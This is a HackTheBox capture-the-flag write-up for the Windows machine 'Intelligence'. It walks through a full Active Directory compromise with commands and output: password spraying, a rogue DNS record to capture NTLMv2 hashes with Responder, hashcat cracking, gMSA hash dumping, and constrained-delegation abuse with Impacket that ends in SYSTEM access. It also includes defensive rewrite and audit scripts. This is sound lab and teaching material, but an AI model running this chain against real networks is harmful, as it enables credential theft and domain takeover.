Intelligence - [HTB]

Marmeus

    Introduction

    Intelligence is a Windows Active Directory machine from HackTheBox where the attacker has to enumerate publicly available files in order to find some usernames and the credentials needed for the user flag. Then, they have to add a fake DNS record to the domain's DNS zone in order to obtain Ted's credentials. Finally, the attacker has to obtain a gMSA password that allows them to impersonate the Domain Administrator and obtain the root flag.

    Enumeration

    As always, let's start by finding all the open ports on the machine with nmap.

    kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.248
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:21 EDT
    Nmap scan report for 10.10.10.248
    Host is up (0.041s latency).
    Not shown: 65514 filtered ports
    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49691/tcp open  unknown
    49692/tcp open  unknown
    49702/tcp open  unknown
    49714/tcp open  unknown
    55797/tcp open  unknown
    57669/tcp open  unknown
    
    Nmap done: 1 IP address (1 host up) scanned in 56.13 seconds

    Then, we continue with a deeper scan of every open port, getting more information about each service.

    kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49685,49686,49704,49708 -T5 -Pn -oN PortsDepth.txt 10.10.10.248
    Nmap scan report for 10.10.10.248
    Host is up (0.044s latency).
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Intelligence
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-08 04:05:09Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    9389/tcp  open  mc-nmf        .NET Message Framing
    49667/tcp open  msrpc         Microsoft Windows RPC
    49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49686/tcp open  msrpc         Microsoft Windows RPC
    49704/tcp open  msrpc         Microsoft Windows RPC
    49708/tcp open  msrpc         Microsoft Windows RPC
    Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2021-07-08T04:05:59
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Jul  7 17:06:37 2021 -- 1 IP address (1 host up) scanned in 96.96 seconds

    Looking at the web page, there are some documents that we can download.

    Intelligence web page

    Both of them have usernames stored in their metadata fields. However, on their own we cannot do much with them.

    kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator
    Creator                         : William.Lee
    Creator                         : Jose.Williams

    Nonetheless, under the documents directory there seem to be more files following the same naming scheme, only with different dates.

    In order to download them all, I created the following script.

    import requests
    
    # Every document follows the pattern 2020-MM-DD-upload.pdf, so we try every
    # month/day combination of 2020 and keep the ones that exist.
    URL_BASE = "http://10.10.10.248/documents/2020-{:02d}-{:02d}-upload.pdf"
    
    for month in range(1, 13):
        for day in range(1, 32):
            url = URL_BASE.format(month, day)
            print(url)
            response = requests.get(url)
            if response.status_code == 200:
                # Save the PDF under its original name, e.g. 2020-06-04-upload.pdf
                with open(url.rsplit("/", 1)[1], "wb") as pdf:
                    pdf.write(response.content)

    You only need to execute the following commands in order to obtain a list of all the users.

    kali@kali:~/Documents/HTB/Intelligence$ python obtainPDFs.py
    kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator | awk '{print $3}' | sort -u > users.txt

    Furthermore, inside the document 2020-06-04-upload.pdf there is the following text.

    New Account Guide
    Welcome to Intelligence Corp!
    Please login using your username and the default password of:
    NewIntelligenceCorpUser9876
    After logging in please change your password as soon as possible.

    Exploitation

    We can find out which user still has the default password by testing it against every username with crackmapexec.

    kali@kali:~/Documents/HTB/Intelligence$ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 
    SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

    Now we can list and access the shared folders.

    kali@kali:~/Documents/HTB/Intelligence$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
    [+] IP: 10.10.10.248:445        Name: intelligence.htb                                  
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            IT                                                      READ ONLY
            NETLOGON                                                READ ONLY       Logon server share 
            SYSVOL                                                  READ ONLY       Logon server share 
            Users                                                   READ ONLY
    

    Under the Users share we can retrieve the user flag.

    kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/Users
    smb: \Tiffany.Molina\Desktop\> dir
      .                                  DR        0  Sun Apr 18 20:51:46 2021
      ..                                 DR        0  Sun Apr 18 20:51:46 2021
      user.txt                           AR       34  Wed Jul 21 12:50:12 2021

    Privilege escalation 1

    Under the IT share we can retrieve a PowerShell script.

    kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/IT
    smb: \> dir
      .                                   D        0  Sun Apr 18 20:50:55 2021
      ..                                  D        0  Sun Apr 18 20:50:55 2021
      downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021
    
                    3770367 blocks of size 4096. 1460519 blocks available
    smb: \> get downdetector.ps1 
    getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)

    The script runs an Active Directory query to obtain every DNS record in the intelligence.htb zone whose name starts with "web". Then, it tries to reach each of them over HTTP, sending the credentials of the user running the script (-UseDefaultCredentials).

    # Check web server status. Scheduled to run every 5min
    Import-Module ActiveDirectory
    foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
        try {
            $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
            if($request.StatusCode -ne 200) {
                Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
            }
        } catch {}
    }
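    The weakness of the script above is that it authenticates to whatever host happens to carry a "web*" record. The following is an added example, not the script from the IT share, showing a hardened rewrite: it probes only an allow-list of known hosts, never offers the task account's credentials, and reports unexpected records instead of contacting them. The zone DN and mail addresses are taken from the original; the allow-list and the SMTP server (mail.intelligence.htb) are constructed placeholders.

```powershell
# Added example: hardened rewrite of downdetector.ps1 (not the original script).
# Assumptions: same DNS zone DN and "web*" naming convention as the original;
# mail.intelligence.htb and the allow-list below are placeholders.
Import-Module ActiveDirectory

$zoneDn   = "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb"
$mailFrom = 'Ted Graves <Ted.Graves@intelligence.htb>'
$mailTo   = $mailFrom
$smtp     = 'mail.intelligence.htb'      # placeholder, not from the write-up

# Constructed allow-list: only hosts we actually operate are ever probed.
$knownWebHosts = @('web01', 'web02')

function Send-Alert([string]$Subject) {
    Send-MailMessage -From $mailFrom -To $mailTo -Subject $Subject -SmtpServer $smtp
}

foreach ($record in Get-ChildItem $zoneDn | Where-Object Name -like 'web*') {
    $name = $record.Name
    if ($knownWebHosts -notcontains $name) {
        # A "web*" record nobody provisioned is exactly how the check got redirected
        # to an attacker-controlled host above, so it is reported, not contacted.
        Send-Alert "Unexpected DNS record in zone: $name"
        continue
    }
    try {
        # No -UseDefaultCredentials: an availability probe needs no authentication,
        # so the task account's NTLM response is never offered to the probed host.
        $response = Invoke-WebRequest -Uri "http://$name.intelligence.htb" -UseBasicParsing -TimeoutSec 10
        if ($response.StatusCode -ne 200) {
            Send-Alert "Host: $name is down (HTTP $($response.StatusCode))"
        }
    } catch {
        # Connection failures are reported rather than silently swallowed.
        Send-Alert "Host: $name is down ($($_.Exception.Message))"
    }
}
```

    Fixing the script removes the credential leak, but the condition that made the attack possible in the first place, a regular domain user being able to create records in the AD-integrated DNS zone, is independent of the script and deserves its own review of the zone's permissions.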

    Hence, we can add our own "web*" DNS record pointing at our machine, so that the scheduled script connects to us and we can capture the user's credentials with Responder.

    In order to add the record we need to synchronise Kali's clock with the server's clock and execute dnstool.py.

    kali@kali:~/Documents/HTB/Intelligence$ sudo ntpdate 10.10.10.248 
    kali@kali:~/Documents/HTB/Intelligence$ python3 dnstool.py -u "intelligence\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -t A -r webMarmeus.intelligence.htb -d 10.10.14.245 10.10.10.248
    [-] Connecting to host...
    [-] Binding to host
    [+] Bind OK
    /media/sf_2_MisPostsBlog/HTB/Intelligence/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
      res = dnsresolver.query(zone, 'SOA')
    [-] Adding new record
    [+] LDAP operation completed successfully

    Then, we need to run Responder and wait up to 10 minutes until the scheduled script authenticates against our host and we retrieve the credential.

    kali@kali:~/Documents/HTB/Intelligence$ sudo responder -I tun0 -A 
    [+] Listening for events...
    
    [HTTP] NTLMv2 Client   : 10.10.10.248
    [HTTP] NTLMv2 Username : intelligence\Ted.Graves
    [HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:9751b32b8379208d[...]

    With hashcat (mode 5600, NetNTLMv2) we can crack the captured response and recover Ted's actual password.

    kali@kali:~/Documents/HTB/Intelligence$ hashcat -m 5600 tedHash.txt /usr/share/wordlists/rockyou.txt
    [...]
    TED.GRAVES::intelligence:9751b32b8379208d:4d13215c35da7ab5751cc22bf9055653:[...]:Mr.Teddy
    

    Privilege escalation 2

    After trying a lot of things, we can retrieve a gMSA password with Ted's credentials using gMSADumper.

    kali@kali:~/Documents/HTB/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
    kali@kali:~/Documents/HTB/Intelligence/gMSADumper$ python3 ./gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
    Users or groups who can read password for svc_int$:
     > DC$
     > itsupport
    svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
    

    The service account svc_int has the attribute msDS-AllowedToDelegateTo set (constrained delegation), which could allow us to impersonate the Domain Administrator against the listed SPN.

    kali@kali:~/Documents/HTB/Intelligence$ sudo ldapsearch -x -h 10.10.10.248 -D "intelligence\TED.GRAVES" -w "Mr.Teddy" -b "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb" 
    [...]
    msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
    [...]
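    Both conditions exploited in this section, a gMSA whose password is readable by a group of ordinary users and an account with constrained delegation towards the domain controller, are visible to the defender with two directory queries. The following audit script is an added example, not part of the original write-up; it assumes the ActiveDirectory module (a domain controller or a host with RSAT) and a session allowed to read the directory.

```powershell
# Added example (not from the write-up): audit of gMSA password readers and
# constrained-delegation accounts. Assumes the ActiveDirectory module is available.
Import-Module ActiveDirectory

function Get-GmsaPasswordReaders {
    # Every gMSA together with the principals allowed to retrieve its managed password.
    # On this machine it would list svc_int$ with DC$ and itsupport as readers, which is
    # why Ted's credentials sufficed to dump it. Readers should be limited to the
    # computer accounts that actually run the service.
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
        ForEach-Object {
            $readers = foreach ($dn in $_.PrincipalsAllowedToRetrieveManagedPassword) {
                (Get-ADObject -Identity $dn).Name
            }
            [PSCustomObject]@{
                Account = $_.SamAccountName
                Readers = ($readers -join ', ')
            }
        }
}

function Get-ConstrainedDelegationAccounts {
    # Accounts with msDS-AllowedToDelegateTo set may obtain service tickets to the listed
    # SPNs on behalf of other users (S4U2proxy). With protocol transition enabled
    # (TRUSTED_TO_AUTH_FOR_DELEGATION, 0x1000000 in userAccountControl) the impersonated
    # user does not even have to authenticate to the account first.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
                 -Properties msDS-AllowedToDelegateTo, userAccountControl |
        ForEach-Object {
            [PSCustomObject]@{
                Account            = $_.Name
                Targets            = ($_.'msDS-AllowedToDelegateTo' -join ', ')
                ProtocolTransition = [bool]($_.userAccountControl -band 0x1000000)
            }
        }
}

Get-GmsaPasswordReaders           | Format-Table -AutoSize
Get-ConstrainedDelegationAccounts | Format-Table -AutoSize
```

    Any account listed by the second query with protocol transition enabled deserves the same scrutiny as a Domain Admin, since its secret is enough to mint tickets for other users to the listed services. Independently of the delegation settings, privileged accounts such as Administrator can be marked "Account is sensitive and cannot be delegated" or placed in the Protected Users group, which prevents them from being impersonated through S4U at all.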

    In order to obtain a service ticket as Administrator, we need to synchronise the clocks once more and execute getST.py, which performs S4U2self followed by S4U2proxy.

    kali@kali:~/Documents/HTB/Intelligence$ sudo net time set -S 10.10.10.248
    kali@kali:~/Documents/HTB/Intelligence$ getST.py intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [*] Getting TGT for user
    [*] Impersonating administrator
    [*]     Requesting S4U2self
    [*]     Requesting S4U2Proxy
    [*] Saving ticket in administrator.ccache

    Now, using that ticket, we are able to execute commands as nt authority\system with atexec.py and obtain the root flag.

    kali@kali:~/Documents/HTB/Intelligence$ export KRB5CCNAME=administrator.ccache
    kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'whoami'
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [!] This will work ONLY on Windows >= Vista
    [*] Creating task \EjMKGuQK
    [*] Running task \EjMKGuQK
    [*] Deleting task \EjMKGuQK
    [*] Attempting to read ADMIN$\Temp\EjMKGuQK.tmp
    nt authority\system
    
    kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [!] This will work ONLY on Windows >= Vista
    [*] Creating task \usqqykxq
    [*] Running task \usqqykxq
    [*] Deleting task \usqqykxq
    [*] Attempting to read ADMIN$\Temp\usqqykxq.tmp
    [CENSORED]